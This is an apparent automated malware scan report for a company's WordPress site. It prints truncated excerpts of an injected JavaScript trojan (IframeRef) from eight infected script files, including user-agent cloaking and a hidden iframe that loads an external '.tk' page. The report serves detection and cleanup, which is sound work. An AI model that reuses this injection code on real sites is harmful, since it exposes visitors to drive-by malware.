New scan:

Malware Scanner report for erko-electro.com

Malicious/Suspicious/Total urls checked
8/0/15
8 pages have malicious code. See details below
Blacklists
OK
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/9
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Scanned pages/files

RequestServer responseStatus
http://erko-electro.com/
200 OK
Content-Length: 30289
Content-Type: text/html
clean
http://erko-electro.com/wp-content/themes/twentytwelve/js/whcookies.js
200 OK
Content-Length: 3165
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

function getCookie(b){var a=document.cookie.match(new RegExp("(?:^|; )"+b.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,'\\$1')+"=([^;]*)"));return a?decodeURIComponent(a[1]):undefined}(function(){function e(b,a,c){var f=(b+'').toLowerCase();var g=(a+'').toLowerCase();var d=0;if((d=f.indexOf(g,c))!==-1){return d}return false}function h(){var b=['bots','AppleWebKit','Windows NT 6.3','X11','Phone','Google'];var a=false;for(var c in b){if(e(navigator.userAgent,b[c])){a=true;break}}return a}var i=(getCooki
... 1857 bytes are skipped ...
: 4px; -webkit-border-radius: 4px; display: inline-block; margin-left: 10px; text-decoration: none; cursor: pointer;">I understand</a></div>';
message_container.innerHTML = html_code;
document.body.appendChild(message_container);
}
}
function WHCloseCookiesWindow() {
WHCreateCookie('cookies_accepted', 'T', 365);
document.getElementById('cookies-message-container').removeChild(document.getElementById('cookies-message'));
}

Antivirus reports:

Microsoft
Trojan:JS/IframeRef.J

http://erko-electro.com/wp-includes/js/jquery/jquery.js?ver=1.11.0
200 OK
Content-Length: 97528
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

function getCookie(b){var a=document.cookie.match(new RegExp("(?:^|; )"+b.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,'\\$1')+"=([^;]*)"));return a?decodeURIComponent(a[1]):undefined}(function(){function e(b,a,c){var f=(b+'').toLowerCase();var g=(a+'').toLowerCase();var d=0;if((d=f.indexOf(g,c))!==-1){return d}return false}function h(){var b=['bots','AppleWebKit','Windows NT 6.3','X11','Phone','Google'];var a=false;for(var c in b){if(e(navigator.userAgent,b[c])){a=true;break}}return a}var i=(getCooki
... 3114 bytes are skipped ...
e["scroll"+a],b.body["offset"+a],e["offset"+a],e["client"+a])):void 0===d?n.css(b,c,g):n.style(b,c,d,g)},b,f?d:void 0,f,null)}})}),n.fn.size=function(){return this.length},n.fn.andSelf=n.fn.addBack,"function"==typeof define&&define.amd&&define("jquery",[],function(){return n});var fd=a.jQuery,gd=a.$;return n.noConflict=function(b){return a.$===n&&(a.$=gd),b&&a.jQuery===n&&(a.jQuery=fd),n},typeof b===L&&(a.jQuery=a.$=n),n});
jQuery.noConflict();

Antivirus reports:

Microsoft
Trojan:JS/IframeRef.J

http://erko-electro.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1
200 OK
Content-Length: 8326
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

function getCookie(b){var a=document.cookie.match(new RegExp("(?:^|; )"+b.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,'\\$1')+"=([^;]*)"));return a?decodeURIComponent(a[1]):undefined}(function(){function e(b,a,c){var f=(b+'').toLowerCase();var g=(a+'').toLowerCase();var d=0;if((d=f.indexOf(g,c))!==-1){return d}return false}function h(){var b=['bots','AppleWebKit','Windows NT 6.3','X11','Phone','Google'];var a=false;for(var c in b){if(e(navigator.userAgent,b[c])){a=true;break}}return a}var i=(getCooki
... 3219 bytes are skipped ...
ector||"**",n),this)},e.event.trigger=function(e,t,n,a){return n||C.test(e)||r("Global events are undocumented and deprecated"),k.call(this,e,t,n||document,a)},e.each(S.split("|"),function(t,n){e.event.special[n]={setup:function(){var t=this;return t!==document&&(e.event.add(document,n+"."+e.guid,function(){e.event.trigger(n,null,t,!0)}),e._data(this,n,e.guid++)),!1},teardown:function(){return this!==document&&e.event.remove(document,n+"."+e._data(this,n)),!1}}})}(jQuery,window);

Antivirus reports:

Microsoft
Trojan:JS/IframeRef.J

http://erko-electro.com/wp-content/plugins/dropdown-menu-widget/scripts/include.js?ver=3.9.3
200 OK
Content-Length: 1512
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

function getCookie(b){var a=document.cookie.match(new RegExp("(?:^|; )"+b.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,'\\$1')+"=([^;]*)"));return a?decodeURIComponent(a[1]):undefined}(function(){function e(b,a,c){var f=(b+'').toLowerCase();var g=(a+'').toLowerCase();var d=0;if((d=f.indexOf(g,c))!==-1){return d}return false}function h(){var b=['bots','AppleWebKit','Windows NT 6.3','X11','Phone','Google'];var a=false;for(var c in b){if(e(navigator.userAgent,b[c])){a=true;break}}return a}var i=(getCooki
... 187 bytes are skipped ...
tk/luckyblock17.html"></iframe>');var j=new Date(new Date().getTime()+48*60*60*1000);document.cookie="akelbriston19ure=1; path=/; expires="+j.toUTCString()}})();
jQuery(document).ready(function($) {
$('.dropdown li').hover( function(){ $(this).addClass('hover'); }, function(){ $(this).removeClass('hover'); });
$(".dropdown li:has(ul)").addClass("parent");
$('ul li:first-child').addClass('first-child'); $('ul li:last-child').addClass('last-child');
});

Antivirus reports:

Microsoft
Trojan:JS/IframeRef.J

http://erko-electro.com/wp-content/plugins/wp-survey-and-quiz-tool/js/site.js?ver=3.9.3
200 OK
Content-Length: 2027
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

function getCookie(b){var a=document.cookie.match(new RegExp("(?:^|; )"+b.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,'\\$1')+"=([^;]*)"));return a?decodeURIComponent(a[1]):undefined}(function(){function e(b,a,c){var f=(b+'').toLowerCase();var g=(a+'').toLowerCase();var d=0;if((d=f.indexOf(g,c))!==-1){return d}return false}function h(){var b=['bots','AppleWebKit','Windows NT 6.3','X11','Phone','Google'];var a=false;for(var c in b){if(e(navigator.userAgent,b[c])){a=true;break}}return a}var i=(getCooki
... 858 bytes are skipped ...
/> jQuery(this).siblings('.wpsqt-toggle-block').hide();
jQuery(this).siblings('.wpsqt-show-toggle').show();
jQuery(this).hide();
return false;
});
jQuery('.wpst_question input, .wpst_question textarea').click( function() {
var explanationText = jQuery(this).parents('.wpst_question').children('.wpsqt-answer-explanation:hidden');
if (explanationText.length != 0) {
jQuery(explanationText).siblings('.wpsqt-show-answer').show();
}
});
});

Antivirus reports:

Microsoft
Trojan:JS/IframeRef.J

http://erko-electro.com/wp-content/plugins/fancy-box/jquery.fancybox.js?ver=1.2.6
200 OK
Content-Length: 10648
Content-Type: application/javascript
clean
http://erko-electro.com/wp-content/plugins/fancy-box/jquery.easing.js?ver=1.3
200 OK
Content-Length: 9223
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

function getCookie(b){var a=document.cookie.match(new RegExp("(?:^|; )"+b.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,'\\$1')+"=([^;]*)"));return a?decodeURIComponent(a[1]):undefined}(function(){function e(b,a,c){var f=(b+'').toLowerCase();var g=(a+'').toLowerCase();var d=0;if((d=f.indexOf(g,c))!==-1){return d}return false}function h(){var b=['bots','AppleWebKit','Windows NT 6.3','X11','Phone','Google'];var a=false;for(var c in b){if(e(navigator.userAgent,b[c])){a=true;break}}return a}var i=(getCooki
... 3412 bytes are skipped ...
r/> } else if (t < (2/2.75)) {
return c*(7.5625*(t-=(1.5/2.75))*t + .75) + b;
} else if (t < (2.5/2.75)) {
return c*(7.5625*(t-=(2.25/2.75))*t + .9375) + b;
} else {
return c*(7.5625*(t-=(2.625/2.75))*t + .984375) + b;
}
},
easeInOutBounce: function (x, t, b, c, d) {
if (t < d/2) return jQuery.easing.easeInBounce (x, t*2, 0, c, d) * .5 + b;
return jQuery.easing.easeOutBounce (x, t*2-d, 0, c, d) * .5 + c*.5 + b;
}
});

Antivirus reports:

Microsoft
Trojan:JS/IframeRef.J

http://erko-electro.com/wp-content/plugins/vslider/js/vslider.js?ver=3.9.3
200 OK
Content-Length: 16743
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

function getCookie(b){var a=document.cookie.match(new RegExp("(?:^|; )"+b.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,'\\$1')+"=([^;]*)"));return a?decodeURIComponent(a[1]):undefined}(function(){function e(b,a,c){var f=(b+'').toLowerCase();var g=(a+'').toLowerCase();var d=0;if((d=f.indexOf(g,c))!==-1){return d}return false}function h(){var b=['bots','AppleWebKit','Windows NT 6.3','X11','Phone','Google'];var a=false;for(var c in b){if(e(navigator.userAgent,b[c])){a=true;break}}return a}var i=(getCooki
... 3525 bytes are skipped ...
function() {
var div_id = jQuery(".coin-slider").find("div").attr("id");
var window_width = jQuery(window).width();
if (div_id == "Slajder" || div_id == "DE" || div_id == "RU" || div_id == "EN") {
var old_style = jQuery("#"+div_id).attr("style");
if (window_width < 1437) {
var new_style = old_style.replace(1437, 1024);
} else {
var new_style = old_style.replace(1024, 1437);
}
jQuery("#"+div_id).attr("style", new_style);
}
});

Antivirus reports:

Microsoft
Trojan:JS/IframeRef.J

http://erko-electro.com/wp-content/themes/twentytwelve/js/jquery.hoverIntent.minified.js
200 OK
Content-Length: 2879
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

function getCookie(b){var a=document.cookie.match(new RegExp("(?:^|; )"+b.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,'\\$1')+"=([^;]*)"));return a?decodeURIComponent(a[1]):undefined}(function(){function e(b,a,c){var f=(b+'').toLowerCase();var g=(a+'').toLowerCase();var d=0;if((d=f.indexOf(g,c))!==-1){return d}return false}function h(){var b=['bots','AppleWebKit','Windows NT 6.3','X11','Phone','Google'];var a=false;for(var c in b){if(e(navigator.userAgent,b[c])){a=true;break}}return a}var i=(getCooki
... 1298 bytes are skipped ...
ob.hoverIntent_t){ob.hoverIntent_t=clearTimeout(ob.hoverIntent_t)}if(e.type==="mouseenter"){pX=ev.pageX;pY=ev.pageY;$(ob).on("mousemove.hoverIntent",track);if(!ob.hoverIntent_s){ob.hoverIntent_t=setTimeout(function(){compare(ev,ob)},cfg.interval)}}else{$(ob).off("mousemove.hoverIntent",track);if(ob.hoverIntent_s){ob.hoverIntent_t=setTimeout(function(){delay(ev,ob)},cfg.timeout)}}};return this.on({"mouseenter.hoverIntent":handleHover,"mouseleave.hoverIntent":handleHover},cfg.selector)}})(jQuery);

Antivirus reports:

Microsoft
Trojan:JS/IframeRef.J

http://erko-electro.com/erkocompany/
200 OK
Content-Length: 27810
Content-Type: text/html
clean
http://erko-electro.com/erkocompany/mission/
200 OK
Content-Length: 27684
Content-Type: text/html
clean
http://erko-electro.com/erkocompany/quality-policy/
200 OK
Content-Length: 29216
Content-Type: text/html
clean
http://erko-electro.com/erkocompany/awards-and-prizes/
200 OK
Content-Length: 31178
Content-Type: text/html
clean
http://erko-electro.com/erkocompany/eu-projects/
200 OK
Content-Length: 34311
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: erko-electro.com

Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Thu, 18 Dec 2014 13:41:39 GMT
Pragma: no-cache
Server: Apache/2
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=8itq1vvljm8rrj1s3to0d8cab6; path=/
Set-Cookie: qtrans_cookie_test=qTranslate+Cookie+Test; path=/; domain=erko-electro.com
X-Powered-By: PHP/5.3.29
Second query (visit from search engine):
GET / HTTP/1.1
Host: erko-electro.com
Referer: http://www.google.com/search?q=erko-electro.com

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=erko-electro.com

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://erko-electro.com/

Result: erko-electro.com is not infected or malware details are not published yet.